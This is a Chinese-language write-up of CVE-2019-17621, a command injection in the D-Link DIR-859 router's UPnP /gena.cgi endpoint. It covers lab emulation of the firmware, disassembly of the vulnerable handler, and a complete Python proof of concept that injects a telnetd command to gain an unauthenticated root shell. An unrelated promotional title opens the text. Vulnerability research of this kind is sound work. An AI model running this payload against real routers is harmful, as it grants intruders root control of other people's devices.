广西建设学院官方网站小程序引流推广平台
文章目录
1.漏洞描述
2.环境搭建
3.漏洞复现
4.漏洞分析
4.1:代码分析
4.2:流量分析
5.poc代码:
1.漏洞描述
漏洞编号:CVE-2019-17621
漏洞名称:D-Link DIR-859 命令注入漏洞
威胁等级:严重
漏洞详情:D-Link UPnP-859 Wi-Fi路由器1.05和1.06B01 Beta 01中的UPnP端点URL /gena.cgi允许未经身份验证的远程攻击者在连接到本地网络时向UPnP服务发送特制的HTTP SUBSCRIBE请求,从而以root身份执行系统命令
影响范围:D-Link DIR-859 v1.06b01beta01及之前的版本
固件下载地址:http://www.dlink.com.cn/techsupport/download.ashx?file=3850
2.环境搭建
下载到固件之后,首先需要把固件 DIR822A1_FW103WWb03.bin模拟运行起来。
在测试虚拟机中,模拟固件用到的是 firmware-analysis-toolkit:GitHub - attify/firmware-analysis-toolkit: Toolkit to emulate firmware and analyse it for security vulnerabilitiesToolkit to emulate firmware and analyse it for security vulnerabilities - GitHub - attify/firmware-analysis-toolkit: Toolkit to emulate firmware and analyse it for security vulnerabilities
https://github.com/attify/firmware-analysis-toolkit也可以直接安装一台 AttifyOS 虚拟机:GitHub - adi0x90/attifyos: Attify OS - Distro for pentesting IoT devicesAttify OS - Distro for pentesting IoT devices . Contribute to adi0x90/attifyos development by creating an account on GitHub.https://github.com/adi0x90/attifyos
这个虚拟机镜像就是专门用来进行物联网 (IoT) 设备的安全评估和渗透测试的,上面预装好了各种必要的工具,比较方便,AttifyOS 3.0 基于 Ubuntu 18.04。
3.漏洞复现
在firmadyne安装目录下执行命令:
./fat.py DIR822A1_FW103WWb03.bin,
出现如下提示后按回车运行固件。
在浏览器中访问 http://192.168.0.1
使用 nmap 扫描可以发现 9999 端口被开启,运行 telnet 服务:
命令:grep -r '49152'
注:49152开启的是UPnP(通用即插即用)网络协议。
运行poc
命令:python3.8 a.py
poc执行成功后,获得了dlink的shell。
4.漏洞分析
4.1:代码分析
使用 binwalk -e 解包固件,获得文件以备后续分析:
进入home/CVE-2019/firmadyne/_DIR822A1_FW103WWb03.bin.extracted/squashfs-root/bin目录后,我们并没有发现httpd可执行文件。
使用grep 命令搜索当前目录及其子目录下所有包含 "httpd" 字符串的文
_DIR822A1_FW103WWb03.bin.extracted/squashfs-root/etc/services/HTTP.php 文件包含了 httpd 的配置文件路径 /var/run/httpd.conf,并且有启动和停止 httpd 服务的命令。这表明该脚本可能用于管理 httpd 服务的启动和停止。
查看httpd.conf文件:
cat var/run/httpd.conf
可知/htdocs/upnp/docs/LAN-1用于存放 UPnP 服务相关的文档和资源.
进入路径/htdocs/upnp/docs/LAN-1
命令:cd /htdocs/upnp/docs/LAN-1
ls -al
注意漏洞通告中:
The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root
能够定位漏洞位于/htdocs/cgibin
ida分析/htdocs/cgibin
通过查找关键词”gena”我们发现调用gena.cgi的genacgi_main函数
反汇编可知此函数的作用是处理一个简单的 CGI (通用网关接口) 请求。
首先检查请求方法和请求 URI 是否有效。
然后检查请求 URI 是否包含 ?service=,并获取服务名称。
根据请求方法(SUBSCRIBE 或 UNSUBSCRIBE)的不同,调用相应的处理函数(sub_40FCE0或sub_4100EC)
注意漏洞通告中:
远程攻击者在连接到本地网络时向UPnP服务发送特制的HTTP SUBSCRIBE请求。
跟进分析请求方法SUBSCRIBE调用的处理函数sub_40FCE0:
反汇编可知此函数的作用是用于 UPnP (通用即插即用) 服务,处理一个订阅请求。
这段代码主要是调用 xmldbc_ephp 函数来执行命令
分析xmldbc_ephp
它是一个包装器函数,用于调用另一个函数 sub_414FB8
跟进sub_414FB8函数
1.调用 sub_4140BC 函数,获取一个文件描述符或类似资源。
2.如果获取成功,sub_4140BC 函数会调用 sub_41490C 函数进行进一步的操作。
跟进sub_41490C 函数:
sub_41490C 处理文件描述符读取和数据处理的函数。
3.如果 sub_41490C 确保成功,它会调用 sub_4146C8 函数进行最终操作。
sub_4146C8 函数作用是等待文件描述符流的状态变化,然后读取数据并调用 sub_41460C 函数。
sub_41460C 函数中fwrite 函数被用来将 a1 指向的内存区域中的数据写入到文件流中。
而a1内存区域中的数据在sub_4140BC就有定义
a1 在这个函数中主要用于:
可知脚本文件的路径run.NOTIFY.php中。
分析run.NOTIFY.php:
这段代码用于处理 UPnP 设备的事件订阅请求,根据不同的服务类型(GENA_subscribe_new 或者GENA_subscribe_sid)执行相应的操作。
其内容定义在了/htdocs/upnpinc/gena.php中。
其中引入多个变量。
但$shell_file 变量没有经过适当的清理和转义,这允许攻击者通过在 URL 参数中注入恶意代码来控制 fwrite 函数写入的内容。
已知:49152端口开启的是UPnP(通用即插即用)网络协议。
我们可以构造如下请求:
http://<router-ip>:49152/gena.cgi?service=`$shell_file+命令 /`
验证命令注入漏洞。
4.2:流量分析
UPnP端点URL /gena.cgi允许未经身份验证的远程攻击者在连接到本地网络时向UPnP服务发送特制的HTTP SUBSCRIBE请求,从而以root身份执行系统命令。
5.poc代码:
代码复现时路由器ip:192.168.0.1
#!/usr/bin/python3import socket
import os
from time import sleepdef httpSUB(server, port, shell_file):print('\n[*] Connection {host}:{port}'.format(host=server, port=port))con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)request = "SUBSCRIBE /gena.cgi?service=" + str(shell_file) + " HTTP/1.0\n"request += "Host: " + str(server) + str(port) + "\n"request += "Callback: <http://192.168.0.4:34033/ServiceProxy27>\n"request += "NT: upnp:event\n"request += "Timeout: Second-1800\n"request += "Accept-Encoding: gzip, deflate\n"request += "User-Agent: gupnp-universal-cp GUPnP/1.0.2 DLNADOC/1.50\n\n"print('[*] Sending Payload')sleep(1)con.connect((socket.gethostbyname(server), port))con.send(request.encode())results = con.recv(4096)print('[*] Running Telnetd Service')sleep(2)print('[*] Opening Telnet Connection\n')os.system('telnet ' + str(server) + ' 9999')serverInput = "192.168.0.1"
portInput = 49152
httpSUB(serverInput, portInput, '`telnetd -p 9999 &`')poc执行成功后,获得了dlink的shell。